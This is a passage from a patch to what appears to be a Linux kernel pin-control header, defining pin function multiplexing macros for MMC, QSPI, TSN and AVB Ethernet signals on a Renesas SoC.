++#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR4 */
++/* IP0SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR4_3_0	FM(TSN0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_7_4	FM(TSN0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_11_8	FM(TSN0_AVTP_PPS1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_15_12	FM(TSN0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_19_16	FM(TSN0_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_23_20	FM(TSN0_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_27_24	FM(TSN0_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_31_28	FM(TSN0_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR4_3_0	FM(TSN0_AVTP_PPS0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_7_4	FM(TSN0_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_11_8	FM(TSN0_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_15_12	FM(TSN0_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_19_16	FM(TSN0_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_23_20	FM(TSN0_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_27_24	FM(TSN0_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_31_28	FM(TSN0_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR4_3_0	FM(TSN0_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_7_4	FM(TSN0_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_11_8	FM(TSN0_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_15_12	FM(TSN0_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_19_16	FM(TSN0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_23_20	FM(PCIE0_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_27_24	FM(PCIE1_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_31_28	FM(AVS0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR4_3_0	FM(AVS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR5 */
++/* IP0SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR5_3_0	FM(AVB2_AVTP_PPS)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_7_4	FM(AVB2_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_11_8	FM(AVB2_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_15_12	FM(AVB2_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_19_16	FM(AVB2_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_23_20	FM(AVB2_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_27_24	FM(AVB2_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR5_31_28	FM(AVB2_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR5_3_0	FM(AVB2_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_7_4	FM(AVB2_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_11_8	FM(AVB2_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_15_12	FM(AVB2_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_19_16	FM(AVB2_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_23_20	FM(AVB2_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_27_24	FM(AVB2_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_31_28	FM(AVB2_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR5_3_0	FM(AVB2_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_7_4	FM(AVB2_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_11_8	FM(AVB2_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_15_12	FM(AVB2_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_19_16	FM(AVB2_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR6 */
+-/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
